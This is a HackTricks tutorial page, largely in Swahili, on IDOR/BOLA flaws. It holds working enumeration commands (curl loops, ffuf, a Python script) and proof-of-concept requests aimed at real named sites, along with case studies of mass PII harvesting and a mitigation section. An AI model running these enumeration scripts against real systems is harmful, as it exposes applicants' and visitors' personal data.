IDOR (Insecure Direct Object Reference)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) hujitokeza wakati web au API endpoint inafichua au inakubali kitambulisho kinachodhibitiwa na mtumiaji ambacho kinatumiwa mojawapo kuingia kwenye object ya ndani bila kuthibitisha kwamba mwito umeidhinishwa kuingia/kuhariri object hiyo. Kutumiwa kwa mafanikio kwa kawaida kunaruhusu kuinua ruhusa kwa usawa au wima kama kusoma au kuhariri data za watumiaji wengine na, katika kesi mbaya kabisa, takeover ya akaunti au mass-data exfiltration.

1. Kutambua IDOR Zinazoweza Kuonekana

1. Tafuta vigezo vinavyorejea object:

• Path: /api/user/1234, /files/550e8400-e29b-41d4-a716-446655440000
• Query: ?id=42, ?invoice=2024-00001
• Body / JSON: {"user_id": 321, "order_id": 987}
• Headers / Cookies: X-Client-ID: 4711

2. Pendelea endpoints ambazo husoma au kusasisha data (GET, PUT, PATCH, DELETE).
3. Tambua wakati vitambulisho viko mfululizo au vinavyoweza kutabirika – ikiwa ID yako ni 64185742, basi 64185741 huenda ipo.
4. Chunguza njia zilizofichwa au mbadala (mfano “Paradox team members” link kwenye kurasa za login) ambazo zinaweza kufichua APIs za ziada.
5. Tumia kikao chenye uthibitisho na idhinishaji la kiwango cha chini na badilisha tu ID ukiweka token/cookie ile ile. Kutokuwepo kwa kosa la authorization kwa kawaida ni dalili ya IDOR.

Kujaribu kubadilisha kwa mkono haraka (Burp Repeater)

PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
Content-Type: application/json

{"lead_id":64185741}

Uorodheshaji wa otomatiki (Burp Intruder / curl loop)

for id in $(seq 64185742 64185700); do
curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-H "Cookie: auth=$TOKEN" \
-d '{"lead_id":'"$id"'}' | jq -e '.email' && echo "Hit $id";
done

Kuorodhesha IDs za download zinazotabirika (ffuf)

Paneli za kuhifadhi faili zilizoidhinishwa mara nyingi huhifadhi metadata kwa kila mtumiaji katika jedwali moja files na kuonyesha endpoint ya /download.php?id=<int>. Iki handler akitazama tu kama ID ipo (na si kama inamhusu mtumiaji aliyethibitishwa), unaweza kutembeza eneo la nambari nzima kwa session cookie yako halali na kuiba backups/configs za watumiaji wengine:

ffuf -u http://file.era.htb/download.php?id=FUZZ \
-H "Cookie: PHPSESSID=<session>" \
-w <(seq 0 6000) \
-fr 'File Not Found' \
-o hits.json
jq -r '.results[].url' hits.json    # fetch surviving IDs such as company backups or signing keys

• -fr inaondoa templates za aina ya 404 ili hits halisi tu zibaki (mfano, IDs 54/150 leaking full site backups and signing material).
• Mchakato uleule wa FFUF unafanya kazi na Burp Intruder au curl loop—hakikisha unaendelea kuwa umeathentikishwa unapoongeza IDs.

Error-response oracle kwa user/file enumeration

Wakati download endpoint inakubali username na filename (mfano /view.php?username=<u>&file=<f>), tofauti ndogo katika ujumbe za makosa mara nyingi hutoa oracle:

• Non-existent username → “User not found”
• Bad filename but valid extension → “File does not exist” (sometimes also lists available files)
• Bad extension → validation error

Kwa session yoyote iliyothibitishwa, unaweza fuzz parameter ya username huku ukishikilia filename isiyo hatari na kuchuja kwa kutumia string “user not found” ili kugundua watumiaji halali:

ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'

Mara tu majina ya watumiaji halali yanapotambulika, omba faili maalum moja kwa moja (mfano, /view.php?username=amanda&file=privacy.odt). Mfano huu kawaida husababisha ufichuzi usioidhinishwa wa nyaraka za watumiaji wengine na credential leakage.

2. Mfano wa Kesi wa Uhalisia – McHire Chatbot Platform (2025)

Wakati wa tathmini ya portal ya ajira inayotumiwa na Paradox.ai, IDOR ifuatayo iligunduliwa:

• Endpoint: PUT /api/lead/cem-xhr
• Authorization: cookie ya session ya mtumiaji kwa any akaunti ya jaribio ya mgahawa
• Body parameter: {"lead_id": N} – kitambulisho cha nambari cha tarakimu 8, mfululizo

Kwa kupunguza lead_id mjaribu alipata waombaji PII kamili (jina, barua pepe, simu, anwani, mapendeleo ya zamu) pamoja na JWT ya mteja iliyomruhusu session hijacking. Uorodheshaji wa anuwai 1 – 64,185,742 uligundua takriban milioni 64 rekodi.

Proof-of-Concept request:

curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-d '{"lead_id":64185741}'

Combined with default admin credentials (123456:123456) that granted access to the test account, the vulnerability resulted in a critical, company-wide data breach.

Case Study – Wristband QR codes as weak bearer tokens (2025–2026)

Flow: Wageni wa maonyesho walipokea QR-coded wristbands; kusoma https://homeofcarlsberg.com/memories/ kuliwezesha browser kuchukua the printed wristband ID, hex-encode it, na kuita backend ya cloudfunctions.net ili kuchukua media zilizohifadhiwa (photos/videos + names). Hakukuwa na no session binding au uthibitisho wa mtumiaji—knowledge of the ID = authorization.

Predictability: Wristband IDs followed a short pattern such as C-285-100 → ASCII hex 432d3238352d313030 (43 2d 32 38 35 2d 31 30 30). The space was estimated at ~26M combinations, trivial to exhaust online.

Exploitation workflow with Burp Intruder:

1. Payload generation: Jenga candidate IDs (mfano, [A-Z]-###-###). Tumia Burp Intruder Pitchfork au Cluster Bomb attack na positions kwa ajili ya herufi na nambari. Ongeza payload processing rule → Add prefix/suffix → payload encoding: ASCII hex ili kila request itume mfuatano wa hex unaotarajiwa na backend.
2. Response grep: Chagua Intruder grep-match kwa markers zinazojitokeza tu kwenye responses halali (mfano, media URLs/JSON fields). Invalid IDs kawaida zilirudisha empty array/404.
3. Throughput measurement: ~1,000,000 IDs zilijaribiwa katika takriban ~2 hours kutoka laptop (~139 req/s). Kwa kiwango hicho keyspace yote (~26M) ingechukuliwa takriban ~52 hours. Run ya sampuli tayari ilifunua ~500 valid wristbands (videos + full names).
4. Rate-limiting verification: Baada vendor alisema walikuwa wanathrottle, rerun same Intruder config. Throughput/hit-rate sawa ilithibitisha kuwa control haikuwepo/haikuwa effective; enumeration iliendelea bila vikwazo.

Quick scriptable variant (client-side hex encoding):

import requests

def to_hex(s):
return ''.join(f"{ord(c):02x}" for c in s)

for band_id in ["C-285-100", "T-544-492"]:
hex_id = to_hex(band_id)
r = requests.get("https://homeofcarlsberg.com/memories/api", params={"id": hex_id})
if r.ok and "media" in r.text:
print(band_id, "->", r.json())

Lesson: Encoding (ASCII→hex/Base64) does not add entropy; short IDs become bearer tokens that are enumerable despite cosmetic encoding. Bila uthibitishaji kwa kila mtumiaji + siri zenye entropy kubwa, media/PII inaweza kukusanywa kwa wingi hata kama “rate limiting” inadaiwa.

3. Impact of IDOR / BOLA

• Kuongezeka kwa kiwango cha usawa – kusoma/sasisha/futa data za watumiaji wengine.
• Kuongezeka kwa kiwango cha wima – mtumiaji mwenye vibali vidogo anapata utendakazi wa admin-pekee.
• Uvujaji wa data kwa wingi ikiwa vitambulisho ni mfululizo (mf., applicant IDs, invoices).
• Kuchukuliwa kwa akaunti kwa kuiba tokens au kuanzisha upya nywila za watumiaji wengine.

4. Kupunguza Hatari & Mazoezi Bora

1. Lazimisha object-level authorization kwenye kila ombi (user_id == session.user).
2. Pendelea indirect, unguessable identifiers (UUIDv4, ULID) badala ya auto-increment IDs.
3. Fanya uthibitishaji server-side, usitegemee hidden form fields au UI controls.
4. Tekeleza RBAC / ABAC checks katika middleware kuu.
5. Ongeza rate-limiting & logging ili kugundua uorodheshaji wa IDs.
6. Fanya security test kwa kila endpoint mpya (unit, integration, na DAST).

5. Zana

• BurpSuite extensions: Authorize, Auto Repeater, Turbo Intruder.
• OWASP ZAP: Auth Matrix, Forced Browse.
• Github projects: bwapp-idor-scanner, Blindy (bulk IDOR hunting).

Marejeo

• McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII
• OWASP Top 10 – Broken Access Control
• How to Find More IDORs – Vickie Li
• HTB Nocturnal: IDOR oracle → file theft
• 0xdf – HTB Era: predictable download IDs → backups and signing keys
• Carlsberg memories wristband IDOR – predictable QR IDs + Intruder brute force (2026)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.